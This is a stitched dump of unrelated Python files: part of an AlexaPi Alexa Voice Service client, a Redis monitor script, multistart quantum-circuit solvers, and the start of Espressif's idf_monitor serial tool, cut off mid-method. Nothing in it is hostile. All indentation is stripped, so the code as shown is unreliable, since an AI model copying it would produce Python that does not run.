config_exists = alexapi.config.filename is not None
if config_exists:
with open(alexapi.config.filename, 'r') as stream:
config = yaml.load(stream)
if debug:
log_level = logging.DEBUG
else:
if config_exists:
log_level = logging.getLevelName(config.get('logging', 'INFO').upper())
else:
log_level = logging.getLevelName('INFO')
if cmdopts.daemon:
coloredlogs.DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
else:
coloredlogs.DEFAULT_LOG_FORMAT = '%(asctime)s %(levelname)s: %(message)s'
coloredlogs.install(level=log_level)
alexa_logger = logging.getLogger('alexapi')
alexa_logger.setLevel(log_level)
logger = logging.getLogger(__name__)
if not config_exists:
logger.critical('Can not find configuration file. Exiting...')
sys.exit(1)
# Setup event commands
event_commands = {
'startup': "",
'pre_interaction': "",
'post_interaction': "",
'shutdown': "",
}
if 'event_commands' in config:
event_commands.update(config['event_commands'])
im = importlib.import_module('alexapi.device_platforms.' + config['platform']['device'] + 'platform', package=None)
cl = getattr(im, config['platform']['device'].capitalize() + 'Platform')
platform = cl(config)
class Player:
config = None
platform = None
pHandler = None
tunein_parser = None
navigation_token = None
playlist_last_item = None
progressReportRequired = []
def __init__(self, config, platform, pHandler): # pylint: disable=redefined-outer-name
self.config = config
self.platform = platform
self.pHandler = pHandler # pylint: disable=invalid-name
self.tunein_parser = tunein.TuneIn(5000)
def play_playlist(self, payload):
self.navigation_token = payload['navigationToken']
self.playlist_last_item = payload['audioItem']['streams'][-1]['streamId']
for stream in payload['audioItem']['streams']: # pylint: disable=redefined-outer-name
streamId = stream['streamId']
if stream['progressReportRequired']:
self.progressReportRequired.append(streamId)
url = stream['streamUrl']
if stream['streamUrl'].startswith("cid:"):
url = "file://" + tmp_path + hashlib.md5(
stream['streamUrl'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3"
if (url.find('radiotime.com') != -1):
url = self.tunein_playlist(url)
self.pHandler.queued_play(url, stream['offsetInMilliseconds'], audio_type='media', stream_id=streamId)
def play_speech(self, mrl):
self.stop()
self.pHandler.blocking_play(mrl)
def stop(self):
self.pHandler.stop()
def is_playing(self):
return self.pHandler.is_playing()
def get_volume(self):
return self.pHandler.volume
def set_volume(self, volume):
self.pHandler.set_volume(volume)
def playback_callback(self, requestType, playerActivity, streamId):
if (requestType == RequestType.STARTED) and (playerActivity == PlayerActivity.PLAYING):
self.platform.indicate_playback()
elif (requestType in [RequestType.INTERRUPTED, RequestType.FINISHED, RequestType.ERROR]) and (
playerActivity == PlayerActivity.IDLE):
self.platform.indicate_playback(False)
if streamId:
if streamId in self.progressReportRequired:
self.progressReportRequired.remove(streamId)
gThread = threading.Thread(target=alexa_playback_progress_report_request,
args=(requestType, playerActivity, streamId))
gThread.start()
if (requestType == RequestType.FINISHED) and (playerActivity == PlayerActivity.IDLE) and (
self.playlist_last_item == streamId):
gThread = threading.Thread(target=alexa_getnextitem, args=(self.navigation_token,))
self.navigation_token = None
gThread.start()
def tunein_playlist(self, url):
logger.debug("TUNE IN URL = %s", url)
req = requests.get(url)
lines = req.content.decode().split('\n')
nurl = self.tunein_parser.parse_stream_url(lines[0])
if nurl:
return nurl[0]
return ""
# Playback handler
def playback_callback(requestType, playerActivity, streamId):
return player.playback_callback(requestType, playerActivity, streamId)
im = importlib.import_module('alexapi.playback_handlers.' + config['sound']['playback_handler'] + "handler",
package=None)
cl = getattr(im, config['sound']['playback_handler'].capitalize() + 'Handler')
pHandler = cl(config, playback_callback)
player = Player(config, platform, pHandler)
path = os.path.realpath(__file__).rstrip(os.path.basename(__file__))
resources_path = os.path.join(path, 'resources', '')
tmp_path = os.path.join(tempfile.mkdtemp(prefix='AlexaPi-runtime-'), '')
MAX_VOLUME = 100
MIN_VOLUME = 30
def internet_on():
try:
requests.get('https://api.amazon.com/auth/o2/token')
logger.info("Connection OK")
return True
except requests.exceptions.RequestException:
logger.error("Connection Failed")
return False
class Token:
_token = ''
_timestamp = None
_validity = 3570
def __init__(self, aconfig):
self._aconfig = aconfig
if not self._aconfig.get('refresh_token'):
logger.critical("AVS refresh_token not found in the configuration file. "
"Run the setup again to fix your installation (see project wiki for installation instructions).")
raise ConfigurationException
self.renew()
def __str__(self):
if (not self._timestamp) or (time.time() - self._timestamp > self._validity):
logger.debug("AVS token: Expired")
self.renew()
return self._token
def renew(self):
logger.info("AVS token: Requesting a new one")
payload = {
"client_id": self._aconfig['Client_ID'],
"client_secret": self._aconfig['Client_Secret'],
"refresh_token": self._aconfig['refresh_token'],
"grant_type": "refresh_token"
}
url = "https://api.amazon.com/auth/o2/token"
try:
response = requests.post(url, data=payload)
resp = json.loads(response.text)
logger.info(resp)
self._token = resp['access_token']
self._timestamp = time.time()
logger.info("AVS token: Obtained successfully")
except requests.exceptions.RequestException as exp:
logger.critical("AVS token: Failed to obtain a token: %s", str(exp))
# from https://github.com/respeaker/Alexa/blob/master/alexa.py
def alexa_speech_recognizer_generate_data(audio, boundary):
"""
Generate a iterator for chunked transfer-encoding request of Alexa Voice Service
Args:
audio: raw 16 bit LSB audio data
boundary: boundary of multipart content
Returns:
"""
logger.debug('Start sending speech to Alexa Voice Service')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="request"\r\n'
'Content-Type: application/json; charset=UTF-8\r\n\r\n'
)
data = {
"messageHeader": {
"deviceContext": [{
"name": "playbackState",
"namespace": "AudioPlayer",
"payload": {
"streamId": "",
"offsetInMilliseconds": "0",
"playerActivity": "IDLE"
}
}]
},
"messageBody": {
"profile": "alexa-close-talk",
"locale": "en-us",
"format": "audio/L16; rate=16000; channels=1"
}
}
yield bytes(chunk + json.dumps(data) + '\r\n', 'utf8')
chunk = '--%s\r\n' % boundary
chunk += (
'Content-Disposition: form-data; name="audio"\r\n'
'Content-Type: audio/L16; rate=16000; channels=1\r\n\r\n'
)
yield bytes(chunk, 'utf8')
for audio_chunk in audio:
yield audio_chunk
yield bytes('--%s--\r\n' % boundary, 'utf8')
logger.debug('Finished sending speech to Alexa Voice Service')
platform.indicate_processing()
def alexa_speech_recognizer(audio_stream):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/speechrecognizer-requests
url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize'
boundary = 'this-is-a-boundary'
headers = {
'Authorization': 'Bearer %s' % token,
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Transfer-Encoding': 'chunked',
}
data = alexa_speech_recognizer_generate_data(audio_stream, boundary)
resp = requests.post(url, headers=headers, data=data)
platform.indicate_processing(False)
process_response(resp)
def alexa_getnextitem(navigationToken):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-getnextitem-request
logger.debug("Sending GetNextItem Request...")
url = 'https://access-alexa-na.amazon.com/v1/avs/audioplayer/getNextItem'
headers = {
'Authorization': 'Bearer %s' % token,
'content-type': 'application/json; charset=UTF-8'
}
data = {
"messageHeader": {},
"messageBody": {
"navigationToken": navigationToken
}
}
response = requests.post(url, headers=headers, data=json.dumps(data))
process_response(response)
def alexa_playback_progress_report_request(requestType, playerActivity, stream_id):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-events-requests
# streamId Specifies the identifier for the current stream.
# offsetInMilliseconds Specifies the current position in the track, in milliseconds.
# playerActivity IDLE, PAUSED, or PLAYING
logger.debug("Sending Playback Progress Report Request...")
headers = {
'Authorization': 'Bearer %s' % token
}
data = {
"messageHeader": {},
"messageBody": {
"playbackState": {
"streamId": stream_id,
"offsetInMilliseconds": 0,
"playerActivity": playerActivity.upper()
}
}
}
if requestType.upper() == RequestType.ERROR:
# The Playback Error method sends a notification to AVS that the audio player has experienced an issue during playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackError"
elif requestType.upper() == RequestType.FINISHED:
# The Playback Finished method sends a notification to AVS that the audio player has completed playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackFinished"
elif requestType.upper() == PlayerActivity.IDLE: # This is an error as described in https://github.com/alexa-pi/AlexaPi/issues/117
# The Playback Idle method sends a notification to AVS that the audio player has reached the end of the playlist.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackIdle"
elif requestType.upper() == RequestType.INTERRUPTED:
# The Playback Interrupted method sends a notification to AVS that the audio player has been interrupted.
# Note: The audio player may have been interrupted by a previous stop Directive.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackInterrupted"
elif requestType.upper() == "PROGRESS_REPORT":
# The Playback Progress Report method sends a notification to AVS with the current state of the audio player.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackProgressReport"
elif requestType.upper() == RequestType.STARTED:
# The Playback Started method sends a notification to AVS that the audio player has started playing.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackStarted"
response = requests.post(url, headers=headers, data=json.dumps(data))
if response.status_code != 204:
logger.warning("(alexa_playback_progress_report_request Response) %s", response)
else:
logger.debug("Playback Progress Report was Successful")
def process_response(response):
logger.debug("Processing Request Response...")
if response.status_code == 204:
logger.debug("Request Response is null (This is OKAY!)")
return
if response.status_code != 200:
logger.info("(process_response Error) Status Code: %s", response.status_code)
response.connection.close()
platform.indicate_failure()
return
try:
data = bytes("Content-Type: ", 'utf-8') + bytes(response.headers['content-type'], 'utf-8') + bytes('\r\n\r\n',
'utf-8') + response.content
msg = email.message_from_bytes(data) # pylint: disable=no-member
except AttributeError:
data = "Content-Type: " + response.headers['content-type'] + '\r\n\r\n' + response.content
msg = email.message_from_string(data)
for payload in msg.get_payload():
if payload.get_content_type() == "application/json":
j = json.loads(payload.get_payload())
logger.debug("JSON String Returned: %s", json.dumps(j, indent=2))
elif payload.get_content_type() == "audio/mpeg":
filename = tmp_path + hashlib.md5(payload.get('Content-ID').strip("<>").encode()).hexdigest() + ".mp3"
with open(filename, 'wb') as f:
f.write(payload.get_payload(decode=True))
else:
logger.debug("NEW CONTENT TYPE RETURNED: %s", payload.get_content_type())
# Now process the response
if 'directives' in j['messageBody']:
if not j['messageBody']['directives']:
logger.debug("0 Directives received")
for directive in j['messageBody']['directives']:
if directive['namespace'] == 'SpeechSynthesizer':
if directive['name'] == 'speak':
player.play_speech("file://" + tmp_path + hashlib.md5(
directive['payload']['audioContent'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3")
elif directive['namespace'] == 'SpeechRecognizer':
if directive['name'] == 'listen':
logger.debug("Further Input Expected, timeout in: %sms",
directive['payload']['timeoutIntervalInMillis'])
player.play_speech(resources_path + 'beep.wav')
timeout = directive['payload']['timeoutIntervalInMillis'] / 116
audio_stream = capture.silence_listener(timeout)
# now process the response
alexa_speech_recognizer(audio_stream)
elif directive['namespace'] == 'AudioPlayer':
if directive['name'] == 'play':
player.play_playlist(directive['payload'])
elif directive['namespace'] == "Speaker":
# speaker control such as volume
if directive['name'] == 'SetVolume':
vol_token = directive['payload']['volume']
type_token = directive['payload']['adjustmentType']
if (type_token == 'relative'):
volume = player.get_volume() + int(vol_token)
else:
volume = int(vol_token)
if (volume > MAX_VOLUME):
volume = MAX_VOLUME
elif (volume < MIN_VOLUME):
volume = MIN_VOLUME
player.set_volume(volume)
logger.debug("new volume = %s", volume)
# Additional Audio Iten
elif 'audioItem' in j['messageBody']:
player.play_playlist(j['messageBody'])
trigger_thread = None
def trigger_callback(trigger):
global trigger_thread
logger.info("Triggered: %s", trigger.name)
triggers.disable()
trigger_thread = threading.Thread(target=trigger_process, args=(trigger,))
trigger_thread.setDaemon(True)
trigger_thread.start()
def trigger_process(trigger):
if player.is_playing():
player.stop()
# clean up the temp directory
if not debug:
for some_file in os.listdir(tmp_path):
file_path = os.path.join(tmp_path, some_file)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except Exception as exp: # pylint: disable=broad-except
logger.warning(exp)
if event_commands['pre_interaction']:
subprocess.Popen(event_commands['pre_interaction'], shell=True, stdout=subprocess.PIPE)
force_record = None
if trigger.event_type in triggers.types_continuous:
force_record = (trigger.continuous_callback, trigger.event_type in triggers.types_vad)
if trigger.voice_confirm:
player.play_speech(resources_path + 'alexayes.mp3')
audio_stream = capture.silence_listener(force_record=force_record)
alexa_speech_recognizer(audio_stream)
triggers.enable()
if event_commands['post_interaction']:
subprocess.Popen(event_commands['post_interaction'], shell=True, stdout=subprocess.PIPE)
def cleanup(signal, frame): # pylint: disable=redefined-outer-name,unused-argument
triggers.disable()
triggers.cleanup()
capture.cleanup()
pHandler.cleanup()
platform.cleanup()
shutil.rmtree(tmp_path)
if event_commands['shutdown']:
subprocess.Popen(event_commands['shutdown'], shell=True, stdout=subprocess.PIPE)
sys.exit(0)
if __name__ == "__main__":
if event_commands['startup']:
subprocess.Popen(event_commands['startup'], shell=True, stdout=subprocess.PIPE)
try:
capture = alexapi.capture.Capture(config, tmp_path)
capture.setup(platform.indicate_recording)
triggers.init(config, trigger_callback, capture)
triggers.setup()
except ConfigurationException as exp:
logger.critical(exp)
sys.exit(1)
pHandler.setup()
platform.setup()
for sig in (signal.SIGABRT, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM):
signal.signal(sig, cleanup)
logger.info("Checking Internet Connection ...")
while not internet_on():
time.sleep(1)
try:
token = Token(config['alexa'])
if not str(token):
raise RuntimeError
except (ConfigurationException, RuntimeError):
platform.indicate_failure()
sys.exit(1)
platform_trigger_callback = triggers.triggers[
'platform'].platform_callback if 'platform' in triggers.triggers else None
platform.after_setup(platform_trigger_callback)
triggers.enable()
if not silent:
player.play_speech(resources_path + "hello.mp3")
platform.indicate_success()
while True:
time.sleep(1)
|
monitor_all_redis.py
|
import datetime
import threading
import redis
import config
class Monitor():
def __init__(self, connection_pool):
self.connection_pool = connection_pool
self.connection = None
def __del__(self):
try:
self.reset()
except:
pass
def reset(self):
if self.connection:
self.connection_pool.release(self.connection)
self.connection = None
def monitor(self):
if self.connection is None:
self.connection = self.connection_pool.get_connection(
'monitor', None)
self.connection.send_command("monitor")
return self.listen()
def parse_response(self):
return self.connection.read_response()
def listen(self):
while True:
yield self.parse_response()
def run_monitor(address):
host, port = address.split(':')
pool = redis.ConnectionPool(host=host, port=port)
monitor = Monitor(pool)
commands = monitor.monitor()
for c in commands:
print(address, datetime.datetime.now(), c)
# Need to put this in your /etc/hosts
# 127.0.0.1 redis6000
# 127.0.0.1 redis6001
# ...
if __name__ == '__main__':
redis_addresses = config.DOCKER_COMPOSE_CONFIG['redis_addresses']
for addr in redis_addresses:
# Python variable is a name. Need to use the whole array instead of a shared variable.
threading.Thread(target=lambda: run_monitor(addr)).start()
|
multistart_solvers.py
|
"""
This module defines solvers that use multiple starting points in order to have a higher chance at finding the global minimum.
"""
from . import utils, logging
from .solvers import Solver, default_solver
import numpy as np
import scipy as sp
import scipy.optimize
from qsrs import native_from_object
import time
from math import pi, gamma, sqrt
import multiprocessing as mp
import sys
from .persistent_aposmm import initialize_APOSMM, decide_where_to_start_localopt, update_history_dist, add_to_local_H
def distance_for_x(x, options, circuit):
"""Calculate the distance between circuit and the target for input x based on the distance metric"""
if options.inner_solver.distance_metric == "Frobenius":
return options.error_func(options.target, circuit.matrix(x))
elif options.inner_solver.distance_metric == "Residuals":
return np.sum(options.error_residuals(options.target, circuit.matrix(x), np.eye(options.target.shape[0]))**2)
def optimize_worker(circuit, options, q, x0):
"""Worker function used to run the inner solver in parallel"""
_, xopt = options.inner_solver.solve_for_unitary(circuit, options, x0)
q.put((distance_for_x(xopt, options, circuit), xopt))
class MultiStart_Solver(Solver):
"""A higher accuracy solver based on APOSMM https://www.mcs.anl.gov/~jlarson/APOSMM/
MultiStart_Solver generally gets better results than other optimizers due to the advanced algorithm
to start multiple local optimizers ("inner solvers") and find the global optimum more often.
"""
def __init__(self, num_threads):
"""Create a MultiStart_Solver instance. Pass num_threads to set how many threads to use in parallel optimization runs"""
self.num_threads = num_threads
self.ctx = mp.get_context('fork') if sys.platform != 'win32' else mp.get_context()
def solve_for_unitary(self, circuit, options, x0=None):
"""Optimize the given circuit based on the provided options with initial point x0 (optional).
Args:
circuit: A qsearch.gates.Gate describing the circuit to optimize
options: This uses the following options:
- inner_solver : which optimizer to use for local optimization runs
- target : the target unitary of synthesis
- logger : A qsearch.logging.Logger that will be used for logging the synthesis process.
- error_func : The function that the Solver will attempt to minimize.
- error_residuals : A function that returns an array of real-valued residuals to be used by a least-squares-based Solver.
x0: the starting point for the optimzier
"""
if 'inner_solver' not in options:
options.inner_solver = default_solver(options)
U = options.target
logger = options.logger if "logger" in options else logging.Logger(verbosity=options.verbosity, stdout_enabled=options.stdout_enabled, output_file=options.log_file)
#np.random.seed(4) # usually we do not want fixed seeds, but it can be useful for some debugging
n = circuit.num_inputs # the number of parameters to optimize (the length that v should be when passed to one of the lambdas created above)
initial_sample_size = 100 # How many points do you want to sample before deciding where to start runs.
num_localopt_runs = self.num_threads # How many localopt runs to start?
specs = {'lb': np.zeros(n),
'ub': np.ones(n),
'standalone': True,
'initial_sample_size':initial_sample_size}
_, _, rk_const, ld, mu, nu, _, H = initialize_APOSMM([],specs,None)
initial_sample = np.random.uniform(0, 1, (initial_sample_size, n))
add_to_local_H(H, initial_sample, specs, on_cube=True)
for i, x in enumerate(initial_sample):
H['f'][i] = distance_for_x(2*np.pi*x, options, circuit)
H[['returned']] = True
update_history_dist(H, n)
starting_inds = decide_where_to_start_localopt(H, n, initial_sample_size, rk_const, ld, mu, nu)
starting_points = H['x'][starting_inds[:num_localopt_runs]]
start = time.time()
q = self.ctx.Queue()
processes = []
rets = []
for x0 in starting_points:
p = self.ctx.Process(target=optimize_worker, args=(circuit, options, q, 2*np.pi*x0))
processes.append(p)
p.start()
for p in processes:
ret = q.get() # will block
rets.append(ret)
for p in processes:
p.join()
end = time.time()
best_found = np.argmin([r[0] for r in rets])
best_val = rets[best_found][0]
xopt = rets[best_found][1]
return (circuit.matrix(xopt), xopt)
class NaiveMultiStart_Solver(Solver):
"""A naive but effective multi-start solver which tries to cover as much of the optimization space at once"""
def __init__(self, num_threads):
"""Create a NaiveMultiStart_Solver instance. Pass num_threads to set how many threads to use in parallel optimization runs"""
self.threads = num_threads if num_threads else 1
self.ctx = mp.get_context('fork') if sys.platform != 'win32' else mp.get_context()
def solve_for_unitary(self, circuit, options, x0=None):
if 'inner_solver' not in options:
options.inner_solver = default_solver(options)
U = options.target
logger = options.logger if "logger" in options else logging.Logger(verbosity=options.verbosity, stdout_enabled=options.stdout_enabled, output_file=options.log_file)
n = circuit.num_inputs
initial_samples = [np.random.uniform((i - 1)/self.threads, i/self.threads, (circuit.num_inputs,)) for i in range(1, self.threads+1)]
q = self.ctx.Queue()
processes = []
rets = []
for x0 in initial_samples:
p = self.ctx.Process(target=optimize_worker, args=(circuit, options, q, x0))
processes.append(p)
p.start()
for p in processes:
ret = q.get() # will block
rets.append(ret)
for p in processes:
p.join()
best_found = np.argmin([r[0] for r in rets])
best_val = rets[best_found][0]
xopt = rets[best_found][1]
return (circuit.matrix(xopt), xopt)
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make (or idf.py) flash" (Ctrl-T Ctrl-F)
# - Run "make (or idf.py) app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches an potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-lx106-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
# In testing mode the stdin is connected to PTY but is not used for input anything. For PTY
# the canceling by fcntl.ioctl isn't working and would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from serial can make exit the monitor
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.exit_key.encode('latin-1'):
raise SerialStopException()
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line.decode(errors="ignore"))):
self.console.write_bytes(line + b'\n')
